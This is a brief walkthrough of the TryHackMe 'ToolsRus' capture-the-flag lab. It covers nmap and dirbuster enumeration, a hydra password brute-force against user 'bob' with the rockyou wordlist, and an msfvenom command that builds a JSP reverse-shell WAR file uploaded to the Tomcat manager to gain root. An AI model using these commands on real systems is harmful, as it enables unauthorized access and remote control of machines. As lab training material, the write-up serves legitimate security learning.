🔫{THM} ToolsRus

Introduction

Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

This room will introduce you to the following tools:

• Dirbuster

• Hydra

• Nmap

• Nikto

• Metasploit

Step 1 – Enumeration

Scanning the port and result multiple http open port.

Next search the directory using dirbuster.

Step 2 – Brute Force

From directory result, we know 2 directories.

As we know user might be bob. Let brute force this using hydra.

Hydra

hydra -l bob -P /usr/share/wordlists/rockyou.txt -f THM_MACHINE http-get /protected/

Next move to port 1234 as it mention about next port and from early finding this port use apache tomcat same as it mention.

Step 3 – Exploit Tomcat

Tomcat got lot of vulnerability especially on manager site where we can upload reverse shell with authentication user. As we manage to get the password from previous brute force, let gather all these things and exploit the vulnerability.

Upload file .war manually

msfvenom -p java/jsp_shell_reverse_tcp LHOST=MACHINE_IP LPORT=PORT -f war -o pay.war

once done upload, check the Application path and click on our payload

See our listening and we manage to enter as root.

Or

Metasploit

We manage to login as root and get the flag from root folder. Thank you for reading.

Learning

1. Brute force using hydra.